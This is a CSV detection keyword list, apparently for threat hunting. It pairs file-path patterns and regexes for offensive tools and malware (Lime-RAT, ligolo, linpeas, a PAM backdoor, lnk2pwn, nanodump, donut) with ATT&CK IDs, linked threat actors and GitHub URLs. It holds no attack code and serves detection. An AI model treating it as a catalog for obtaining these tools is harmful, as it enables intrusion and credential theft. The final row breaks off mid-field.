"*/ligolo-proxy*",".{0,1000}\/ligolo\-proxy.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8517"
"*/ligolo-selfcert*",".{0,1000}\/ligolo\-selfcert.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8518"
"*/Lime-Crypter.git*",".{0,1000}\/Lime\-Crypter\.git.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","8519"
"*/Lime-RAT-*.zip*",".{0,1000}\/Lime\-RAT\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8520"
"*/LimeRAT.exe*",".{0,1000}\/LimeRAT\.exe.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8521"
"*/Lime-RAT.git*",".{0,1000}\/Lime\-RAT\.git.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8522"
"*/LimeRAT.v*.zip*",".{0,1000}\/LimeRAT\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8523"
"*/Lime-RAT/releases/download/*",".{0,1000}\/Lime\-RAT\/releases\/download\/.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8524"
"*/LimeRAT-MUSIC.MP3*",".{0,1000}\/LimeRAT\-MUSIC\.MP3.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","8525"
"*/LinEnum.git*",".{0,1000}\/LinEnum\.git.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7309","2011","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z","8526"
"*/LinEnum/*",".{0,1000}\/LinEnum\/.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7309","2011","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z","8527"
"*/linikatz.git*",".{0,1000}\/linikatz\.git.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","8528"
"*/LinikatzV2/*",".{0,1000}\/LinikatzV2\/.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","8529"
"*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","8530"
"*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","8531"
"*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8532"
"*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8533"
"*/linpeas.txt*",".{0,1000}\/linpeas\.txt.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8534"
"*/linpeasBaseBuilder.py*",".{0,1000}\/linpeasBaseBuilder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8535"
"*/linpeasBuilder.py*",".{0,1000}\/linpeasBuilder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","8536"
"*/linux_ldso_dynamic.c*",".{0,1000}\/linux_ldso_dynamic\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8537"
"*/linux_ldso_hwcap.c*",".{0,1000}\/linux_ldso_hwcap\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8538"
"*/linux_ldso_hwcap_64.c*",".{0,1000}\/linux_ldso_hwcap_64\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8539"
"*/linux_offset2lib.c*",".{0,1000}\/linux_offset2lib\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8540"
"*/linux_stealth.py*",".{0,1000}\/linux_stealth\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8541"
"*/linux-exploit-suggester.sh*",".{0,1000}\/linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","8546"
"*/linux-pam-backdoor.git*",".{0,1000}\/linux\-pam\-backdoor\.git.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","8547"
"*/linuxprivchecker.git*",".{0,1000}\/linuxprivchecker\.git.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","1","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","8548"
"*/linux-smart-enumeration.git*",".{0,1000}\/linux\-smart\-enumeration\.git.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","8549"
"*/linWinPwn*",".{0,1000}\/linWinPwn.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8550"
"*/ListAllUsers.ps1*",".{0,1000}\/ListAllUsers\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8551"
"*/ListLogged-inUsers.ps1*",".{0,1000}\/ListLogged\-inUsers\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8552"
"*/listProxyPool?k=*",".{0,1000}\/listProxyPool\?k\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","10","N/A","N/A","N/A","N/A","8553"
"*/ListRDPConnections.exe*",".{0,1000}\/ListRDPConnections\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8554"
"*/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php*",".{0,1000}\/Liz0ziM\sPrivate\sSafe\sMode\sCommand\sExecuriton\sBypass\sExploit\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8555"
"*/llmnr-resolve.nse*",".{0,1000}\/llmnr\-resolve\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8556"
"*/lltd-discovery.nse*",".{0,1000}\/lltd\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8557"
"*/lnk2pwn.git*",".{0,1000}\/lnk2pwn\.git.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","8560"
"*/lnk2pwn-1.0.0.zip*",".{0,1000}\/lnk2pwn\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","8561"
"*/lnkbomb.git*",".{0,1000}\/lnkbomb\.git.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","8562"
"*/lnkbomb.py*",".{0,1000}\/lnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","8563"
"*/LNKUp.git*",".{0,1000}\/LNKUp\.git.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","8564"
"*/LNKUp/generate.py*",".{0,1000}\/LNKUp\/generate\.py.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","8565"
"*/load_ssp.x64.exe*",".{0,1000}\/load_ssp\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","8566"
"*/load-assembly.py*",".{0,1000}\/load\-assembly\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8567"
"*/loadbalancer.py*",".{0,1000}\/loadbalancer\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","8568"
"*/LoadDllRemote.cs*",".{0,1000}\/LoadDllRemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8569"
"*/loader/bypass.c",".{0,1000}\/loader\/bypass\.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","8570"
"*/loader/bypass.h",".{0,1000}\/loader\/bypass\.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","8571"
"*/loader/x64/Release/loader.exe*",".{0,1000}\/loader\/x64\/Release\/loader\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - 